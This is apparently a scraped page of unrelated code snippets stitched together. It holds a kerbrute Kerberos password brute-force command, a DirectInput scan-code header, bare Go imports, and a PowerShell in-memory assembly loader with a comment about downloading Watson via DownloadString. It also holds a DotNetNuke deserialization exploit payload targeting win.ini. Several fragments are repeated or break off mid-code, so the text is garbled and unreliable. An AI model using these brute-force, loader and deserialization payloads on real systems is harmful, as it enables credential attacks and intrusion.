With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| #ifndef H_DIK | |
| #define H_DIK | |
| // Listed are keyboard scan code constants, taken from dinput.h | |
| #define DIK_ESCAPE 0x01 | |
| #define DIK_1 0x02 | |
| #define DIK_2 0x03 | |
| #define DIK_3 0x04 | |
| #define DIK_4 0x05 |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| package main | |
| import ( | |
| "crypto/tls" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" | |
| "net/url" | |
| "strings" | |
| ) |
| # was a little bored, wrote up a quick Execute Assembly script lol | |
| # download watson from memory or something with DownloadString, save to a variable and invoke from with -PEBytes. | |
| function Execute-Assembly { | |
| param( | |
| [parameter(Mandatory=$true)][byte[]]$PEBytes, | |
| [parameter(Mandatory=$false)][string]$Arguments | |
| ) | |
| $meth = [System.Reflection.Assembly]::Load($bytes); |
| <profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile> |